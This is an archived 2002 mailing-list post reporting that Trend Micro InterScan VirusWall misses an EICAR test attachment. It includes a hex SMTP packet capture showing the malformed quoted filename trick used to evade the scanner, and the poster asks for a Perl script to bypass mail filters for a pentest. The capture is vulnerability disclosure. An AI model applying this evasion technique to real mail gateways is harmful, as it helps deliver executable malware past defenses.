bypassing attachments

From: Onie Camara (neilat_private)
Date: Sat Feb 23 2002 - 09:37:29 PST

  • Next message: Kurt Seifried: "Re: pine overflow" 

    Hi guys,

I don't know where to post actually.

I am very interested in security and would like some of your help.

I have found, I hope, a vulnerability in Trend Micro interscan viruswall.
I have a setup of qmail and sqwebmail running on freebsd. When I send an
email from sqwebmail containing
the eicar test virus attachment, the attachment is bypassed by Interscan and
is successfully delivered .

I have escalated this to Trend Micro since the early week of January and
until now, even with the latest pattern
file, it is still bypassed.

This is somewhat related to the Feb 18 post at
http://www.securiteam.com/securitynews/5DP0I206AY.html

Now, since I will be doing a pentest for another company, I would like some
help on where I can download
a perl script that will send an exe,com attachment to a mail server but will
bypass the filtering gateway.

I have used this script, http://www.securiteam.com/exploits/5ZP0D2K6AY.html
It works but
the extension's attachment changes. Ex. eicar.com will become eicar._com

Here is a tcpdump:

bash# tcpdump -x -X -s 14400 port not 22 and port not 53 and not arp and
port not 68 and port not 67 and port not 80 and not igmp
tcpdump: listening on xl0
11:23:45.478174 65.192.117.68.1760 > dhcp-74-1628.smtp: S
2796302688:2796302688(0) win 16384 <mss 1460,nop,nop,sackOK,nop,wscale
0,nop,nop,timestamp 546622090 0> (DF)
0x0000   4500 0040 66b1 4000 3406 1f70 41c0 7544        E..@f.@.4..pA.uD
0x0010   0cf8 fc9a 06e0 0019 a6ac 3160 0000 0000        ..........1`....
0x0020   b002 4000 6b45 0000 0204 05b4 0101 0402        ..@.kE..........
0x0030   0103 0300 0101 080a 2094 ca8a 0000 0000        ................
11:23:45.478679 dhcp-74-1628.smtp > 65.192.117.68.1760: S
1437153606:1437153606(0) ack 2796302689 win 33304 <mss 1460,nop,wscale
0,nop,nop,timestamp 908042 546622090> (DF)
0x0000   4500 003c 0f7c 4000 4006 6aa9 0cf8 fc9a        E..<.|@.@.j.....
0x0010   41c0 7544 0019 06e0 55a9 3946 a6ac 3161        A.uD....U.9F..1a
0x0020   a012 8218 d41b 0000 0204 05b4 0103 0300        ................
0x0030   0101 080a 000d db0a 2094 ca8a                  ............
11:23:45.494674 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 1 win 17376
<nop,nop,timestamp 546622090 908042> (DF)
0x0000   4500 0034 42c4 4000 3406 4369 41c0 7544        E..4B.@.4.CiA.uD
0x0010   0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3947        ..........1aU.9G
0x0020   8010 43e0 3e18 0000 0101 080a 2094 ca8a        ..C.>...........
0x0030   000d db0a                                      ....
11:23:45.530047 dhcp-74-1628.smtp > 65.192.117.68.1760: P 1:43(42) ack 1 win
33304 <nop,nop,timestamp 908048 546622090> (DF)
0x0000   4500 005e 7e6d 4000 4006 fb95 0cf8 fc9a        E..^~m@.@.......
0x0010   41c0 7544 0019 06e0 55a9 3947 a6ac 3161        A.uD....U.9G..1a
0x0020   8018 8218 e931 0000 0101 080a 000d db10        .....1..........
0x0030   2094 ca8a 3232 3020 7072 6f6d 6973 6375        ....220.promiscu
0x0040   6f75 732e 6479 6e64 6e73 2e6f 7267 2045        ous.dyndns.org.E
0x0050   534d 5450 2050 6f73 7466 6978 0d0a             SMTP.Postfix..
11:23:45.553735 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 43 win 17376
<nop,nop,timestamp 546622090 908048> (DF)
0x0000   4500 0034 2223 4000 3406 640a 41c0 7544        E..4"#@.4.d.A.uD
0x0010   0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3971        ..........1aU.9q
0x0020   8010 43e0 3de8 0000 0101 080a 2094 ca8a        ..C.=...........
0x0030   000d db10                                      ....
11:23:45.553933 65.192.117.68.1760 > dhcp-74-1628.smtp: P 1:33(32) ack 43
win 17376 <nop,nop,timestamp 546622090 908048> (DF)
0x0000   4500 0054 5ac7 4000 3406 2b46 41c0 7544        E..TZ.@.4.+FA.uD
0x0010   0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3971        ..........1aU.9q
0x0020   8018 43e0 85fe 0000 0101 080a 2094 ca8a        ..C.............
0x0030   000d db10 4548 4c4f 2061 6e74 6973 7061        ....EHLO.antispa
0x0040   6d2e 7265 6d69 6e67 746f 6e6c 7464 2e63        m.remingtonltd.c
0x0050   6f6d 0d0a                                      om..
11:23:45.554671 dhcp-74-1628.smtp > 65.192.117.68.1760: P 43:151(108) ack 33
win 33304 <nop,nop,timestamp 908050 546622090> (DF)
0x0000   4500 00a0 b62a 4000 4006 c396 0cf8 fc9a        E....*@.@.......
0x0010   41c0 7544 0019 06e0 55a9 3971 a6ac 3181        A.uD....U.9q..1.
0x0020   8018 8218 5f91 0000 0101 080a 000d db12        ...._...........
0x0030   2094 ca8a 3235 302d 7072 6f6d 6973 6375        ....250-promiscu
0x0040   6f75 732e 6479 6e64 6e73 2e6f 7267 0d0a        ous.dyndns.org..
0x0050   3235 302d 5049 5045 4c49 4e49 4e47 0d0a        250-PIPELINING..
0x0060   3235 302d 5349 5a45 2032 3030 3030 3030        250-SIZE.2000000
0x0070   300d 0a32 3530 2d56 5246 590d 0a32 3530        0..250-VRFY..250
0x0080   2d45 5452 4e0d 0a32 3530 2d58 5645 5250        -ETRN..250-XVERP
0x0090   0d0a 3235 3020 3842 4954 4d49 4d45 0d0a        ..250.8BITMIME..
11:23:45.571627 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 151 win 17268
<nop,nop,timestamp 546622090 908050> (DF)
0x0000   4500 0034 0598 4000 3406 8095 41c0 7544        E..4..@.4...A.uD
0x0010   0cf8 fc9a 06e0 0019 a6ac 3181 55a9 39dd        ..........1.U.9.
0x0020   8010 4374 3dc6 0000 0101 080a 2094 ca8a        ..Ct=...........
0x0030   000d db12                                      ....
11:23:45.573727 65.192.117.68.1760 > dhcp-74-1628.smtp: P 33:101(68) ack 151
win 17376 <nop,nop,timestamp 546622090 908050> (DF)
0x0000   4500 0078 01ee 4000 3406 83fb 41c0 7544        E..x..@.4...A.uD
0x0010   0cf8 fc9a 06e0 0019 a6ac 3181 55a9 39dd        ..........1.U.9.
0x0020   8018 43e0 4202 0000 0101 080a 2094 ca8a        ..C.B...........
0x0030   000d db12 4d41 494c 2046 524f 4d3a 3c3e        ....MAIL.FROM:<>
0x0040   2053 495a 453d 3131 3139 0d0a 5243 5054        .SIZE=1119..RCPT
0x0050   2054 4f3a 3c6e 6569 6c40 7265 7374 7269        .TO:<neil@restri
0x0060   6374 6564 2e64 796e 646e 732e 6f72 673e        cted.dyndns.org>
0x0070   0d0a 4441 5441 0d0a                            ..DATA..
11:23:45.580592 dhcp-74-1628.smtp > 65.192.117.68.1760: P 151:204(53) ack
101 win 33304 <nop,nop,timestamp 908053 546622090> (DF)
0x0000   4500 0069 6a03 4000 4006 0ff5 0cf8 fc9a        E..ij.@.@.......
0x0010   41c0 7544 0019 06e0 55a9 39dd a6ac 31c5        A.uD....U.9...1.
0x0020   8018 8218 502b 0000 0101 080a 000d db15        ....P+..........
0x0030   2094 ca8a 3235 3020 4f6b 0d0a 3235 3020        ....250.Ok..250.
0x0040   4f6b 0d0a 3335 3420 456e 6420 6461 7461        Ok..354.End.data
0x0050   2077 6974 6820 3c43 523e 3c4c 463e 2e3c        .with.<CR><LF>.<
0x0060   4352 3e3c 4c46 3e0d 0a                         CR><LF>..
11:23:45.607780 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 204 win 17323
<nop,nop,timestamp 546622090 908053> (DF)
0x0000   4500 0034 2d7e 4000 3406 58af 41c0 7544        E..4-~@.4.X.A.uD
0x0010   0cf8 fc9a 06e0 0019 a6ac 31c5 55a9 3a12        ..........1.U.:.
0x0020   8010 43ab 3d13 0000 0101 080a 2094 ca8a        ..C.=...........
0x0030   000d db15                                      ....
11:23:45.615561 65.192.117.68.1760 > dhcp-74-1628.smtp: P 101:1229(1128) ack
204 win 17376 <nop,nop,timestamp 546622090 908053> (DF)
0x0000   4500 049c 4e19 4000 3406 33ac 41c0 7544        E...N.@.4.3.A.uD
0x0010   0cf8 fc9a 06e0 0019 a6ac 31c5 55a9 3a12        ..........1.U.:.
0x0020   8018 43e0 715b 0000 0101 080a 2094 ca8a        ..C.q[..........
0x0030   000d db15 5265 6365 6976 6564 3a20 6672        ....Received:.fr
0x0040   6f6d 2079 6f75 2028 6c6f 6361 6c68 6f73        om.you.(localhos
0x0050   7420 5b31 3237 2e30 2e30 2e31 5d29 0d0a        t.[127.0.0.1])..
0x0060   0962 7920 616e 7469 7370 616d 2e72 656d        .by.antispam.rem
0x0070   696e 6774 6f6e 6c74 642e 636f 6d20 2850        ingtonltd.com.(P
0x0080   6f73 7466 6978 2920 7769 7468 2053 4d54        ostfix).with.SMT
0x0090   5020 6964 2036 3730 4237 4538 4434 0d0a        P.id.670B7E8D4..
0x00a0   0966 6f72 203c 6e65 696c 4072 6573 7472        .for.<neil@restr
0x00b0   6963 7465 642e 6479 6e64 6e73 2e6f 7267        icted.dyndns.org
0x00c0   3e3b 2053 6174 2c20 3233 2046 6562 2032        >;.Sat,.23.Feb.2
0x00d0   3030 3220 3131 3a31 363a 3137 202d 3036        002.11:16:17.-06
0x00e0   3030 2028 4353 5429 0d0a 4672 6f6d 3a20        00.(CST)..From:.
0x00f0   736f 6d65 4072 656d 696e 6774 6f6e 6c74        some@remingtonlt
0x0100   642e 636f 6d0d 0a54 6f3a 206e 6569 6c40        d.com..To:.neil@
0x0110   7265 7374 7269 6374 6564 2e64 796e 646e        restricted.dyndn
0x0120   732e 6f72 670d 0a53 7562 6a65 6374 3a20        s.org..Subject:.
0x0130   7465 7374 0d0a 4d49 4d45 2d56 6572 7369        test..MIME-Versi
0x0140   6f6e 3a20 312e 300d 0a43 6f6e 7465 6e74        on:.1.0..Content
0x0150   2d54 7970 653a 206d 756c 7469 7061 7274        -Type:.multipart
0x0160   2f72 656c 6174 6564 3b0d 0a20 2020 2020        /related;.......
0x0170   2020 2074 7970 653d 226d 756c 7469 7061        ...type="multipa
0x0180   7274 2f61 6c74 6572 6e61 7469 7665 223b        rt/alternative";
0x0190   0d0a 2020 2020 2020 2020 626f 756e 6461        ..........bounda
0x01a0   7279 3d22 4e65 7874 5061 7274 3139 220d        ry="NextPart19".
0x01b0   0a4d 6573 7361 6765 2d49 643a 203c 3230        .Message-Id:.<20
0x01c0   3032 3032 3233 3137 3136 3137 2e36 3730        020223171617.670
0x01d0   4237 4538 4434 4061 6e74 6973 7061 6d2e        B7E8D4@antispam.
0x01e0   7265 6d69 6e67 746f 6e6c 7464 2e63 6f6d        remingtonltd.com
0x01f0   3e0d 0a44 6174 653a 2053 6174 2c20 3233        >..Date:.Sat,.23
0x0200   2046 6562 2032 3030 3220 3131 3a31 363a        .Feb.2002.11:16:
0x0210   3137 202d 3036 3030 2028 4353 5429 0d0a        17.-0600.(CST)..
0x0220   0d0a 5468 6973 2069 7320 6120 6d75 6c74        ..This.is.a.mult
0x0230   692d 7061 7274 206d 6573 7361 6765 2069        i-part.message.i
0x0240   6e20 4d49 4d45 2066 6f72 6d61 742e 0d0a        n.MIME.format...
0x0250   0d0a 2d2d 4e65 7874 5061 7274 3139 0d0a        ..--NextPart19..
0x0260   436f 6e74 656e 742d 5479 7065 3a20 6d75        Content-Type:.mu
0x0270   6c74 6970 6172 742f 616c 7465 726e 6174        ltipart/alternat
0x0280   6976 653b 0d0a 2020 2020 2020 2020 626f        ive;..........bo
0x0290   756e 6461 7279 3d22 4e65 7874 5061 7274        undary="NextPart
0x02a0   3230 220d 0a0d 0a2d 2d4e 6578 7450 6172        20"....--NextPar
0x02b0   7432 300d 0a43 6f6e 7465 6e74 2d54 7970        t20..Content-Typ
0x02c0   653a 2074 6578 742f 706c 6169 6e0d 0a43        e:.text/plain..C
0x02d0   6f6e 7465 6e74 2d54 7261 6e73 6665 722d        ontent-Transfer-
0x02e0   456e 636f 6469 6e67 3a20 7175 6f74 6564        Encoding:.quoted
0x02f0   2d70 7269 6e74 6162 6c65 0d0a 0d0a 2d2d        -printable....--
0x0300   4e65 7874 5061 7274 3230 0d0a 436f 6e74        NextPart20..Cont
0x0310   656e 742d 5479 7065 3a20 7465 7874 2f68        ent-Type:.text/h
0x0320   746d 6c3b 0d0a 2020 2020 2020 2020 6368        tml;..........ch
0x0330   6172 7365 743d 2269 736f 2d38 3835 392d        arset="iso-8859-
0x0340   3122 0d0a 436f 6e74 656e 742d 5472 616e        1"..Content-Tran
0x0350   7366 6572 2d45 6e63 6f64 696e 673a 2071        sfer-Encoding:.q
0x0360   756f 7465 642d 7072 696e 7461 626c 650d        uoted-printable.
0x0370   0a0d 0a74 6573 740d 0a2d 2d4e 6578 7450        ...test..--NextP
0x0380   6172 7432 302d 2d0d 0a0d 0a2d 2d4e 6578        art20--....--Nex
0x0390   7450 6172 7431 390d 0a43 6f6e 7465 6e74        tPart19..Content
0x03a0   2d54 7970 653a 2061 7070 6c69 6361 7469        -Type:.applicati
0x03b0   6f6e 2f78 2d6d 7364 6f77 6e6c 6f61 640d        on/x-msdownload.
0x03c0   0a43 6f6e 7465 6e74 2d44 6973 706f 7369        .Content-Disposi
0x03d0   7469 6f6e 3a20 6174 7461 6368 6d65 6e74        tion:.attachment
0x03e0   3b66 696c 656e 616d 653d 2265 6963 6172        ;filename="eicar
0x03f0   2e22 636f 6d22 0d0a 436f 6e74 656e 742d        ."com"..Content-
0x0400   5472 616e 7366 6572 2d45 6e63 6f64 696e        Transfer-Encodin
0x0410   673a 2062 6173 6536 340d 0a0d 0a57 4456        g:.base64....WDV
0x0420   5049 5641 6c51 4546 5157 7a52 6355 4670        PIVAlQEFQWzRcUFp
0x0430   594e 5451 6f55 4634 704e 304e 444b 5464        YNTQoUF4pN0NDKTd
0x0440   394a 4556 4a51 3046 534c 564e 5551 5535        9JEVJQ0FSLVNUQU5
0x0450   4551 564a 454c 5546 4f56 456c 5753 564a        EQVJELUFOVElWSVJ
0x0460   5655 7931 5552 564e 550d 0a4c 555a 4a54        VUy1URVNU..LUZJT
0x0470   4555 684a 4567 7253 436f 4e43 673d 3d0d        EUhJEgrSCoNCg==.
0x0480   0a0d 0a2d 2d4e 6578 7450 6172 7431 392d        ...--NextPart19-
0x0490   2d0d 0a2e 0d0a 5155 4954 0d0a                  -.....QUIT..
11:23:45.709692 dhcp-74-1628.smtp > 65.192.117.68.1760: . ack 1229 win 33304
<nop,nop,timestamp 908066 546622090> (DF)
0x0000   4500 0034 cc50 4000 4006 addc 0cf8 fc9a        E..4.P@.@.......
0x0010   41c0 7544 0019 06e0 55a9 3a12 a6ac 362d        A.uD....U.:...6-
0x0020   8010 8218 fa30 0000 0101 080a 000d db22        .....0........."
0x0030   2094 ca8a                                      ....
11:23:47.074647 dhcp-74-1628.smtp > 65.192.117.68.1760: P 204:243(39) ack
1229 win 33304 <nop,nop,timestamp 908202 546622090> (DF)
0x0000   4500 005b 9c6c 4000 4006 dd99 0cf8 fc9a        E..[.l@.@.......
0x0010   41c0 7544 0019 06e0 55a9 3a12 a6ac 362d        A.uD....U.:...6-
0x0020   8018 8218 00bc 0000 0101 080a 000d dbaa        ................
0x0030   2094 ca8a 3235 3020 4f6b 3a20 7175 6575        ....250.Ok:.queu
0x0040   6564 2061 7320 3843 4237 3635 3334 3745        ed.as.8CB765347E
0x0050   0d0a 3232 3120 4279 650d 0a                    ..221.Bye..
11:23:47.074908 dhcp-74-1628.smtp > 65.192.117.68.1760: F 243:243(0) ack
1229 win 33304 <nop,nop,timestamp 908202 546622090> (DF)
0x0000   4500 0034 fa45 4000 4006 7fe7 0cf8 fc9a        E..4.E@.@.......
0x0010   41c0 7544 0019 06e0 55a9 3a39 a6ac 362d        A.uD....U.:9..6-
0x0020   8011 8218 f980 0000 0101 080a 000d dbaa        ................
0x0030   2094 ca8a                                      ....
11:23:47.091722 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 243 win 17376
<nop,nop,timestamp 546622093 908202> (DF)
0x0000   4500 0034 4a13 4000 3406 3c1a 41c0 7544        E..4J.@.4.<.A.uD
0x0010   0cf8 fc9a 06e0 0019 a6ac 362d 55a9 3a39        ..........6-U.:9
0x0020   8010 43e0 37b7 0000 0101 080a 2094 ca8d        ..C.7...........
0x0030   000d dbaa                                      ....
11:23:47.092205 65.192.117.68.1760 > dhcp-74-1628.smtp: F 1229:1229(0) ack
243 win 17376 <nop,nop,timestamp 546622093 908202> (DF)
0x0000   4500 0034 4ca3 4000 3406 398a 41c0 7544        E..4L.@.4.9.A.uD
0x0010   0cf8 fc9a 06e0 0019 a6ac 362d 55a9 3a39        ..........6-U.:9
0x0020   8011 43e0 37b6 0000 0101 080a 2094 ca8d        ..C.7...........
0x0030   000d dbaa                                      ....
11:23:47.092519 dhcp-74-1628.smtp > 65.192.117.68.1760: F 243:243(0) ack
1230 win 33304 <nop,nop,timestamp 908204 546622093> (DF)
0x0000   4500 0034 f518 4000 4006 8514 0cf8 fc9a        E..4..@.@.......
0x0010   41c0 7544 0019 06e0 55a9 3a39 a6ac 362e        A.uD....U.:9..6.
0x0020   8011 8218 f97a 0000 0101 080a 000d dbac        .....z..........
0x0030   2094 ca8d                                      ....
11:23:47.097243 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 244 win 17376
<nop,nop,timestamp 546622093 908202> (DF)
0x0000   4500 0034 5a93 4000 3406 2b9a 41c0 7544        E..4Z.@.4.+.A.uD
0x0010   0cf8 fc9a 06e0 0019 a6ac 362e 55a9 3a3a        ..........6.U.::
0x0020   8010 43e0 37b5 0000 0101 080a 2094 ca8d        ..C.7...........
0x0030   000d dbaa                                      ....
11:23:47.109155 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 244 win 17376
<nop,nop,timestamp 546622093 908204> (DF)
0x0000   4500 0034 3e09 4000 3406 4824 41c0 7544        E..4>.@.4.H$A.uD
0x0010   0cf8 fc9a 06e0 0019 a6ac 362e 55a9 3a3a        ..........6.U.::
0x0020   8010 43e0 37b3 0000 0101 080a 2094 ca8d        ..C.7...........
0x0030   000d dbac                                      ....
^C

    This archive was generated by hypermail 2b30 : Sat Feb 23 2002 - 10:09:50 PST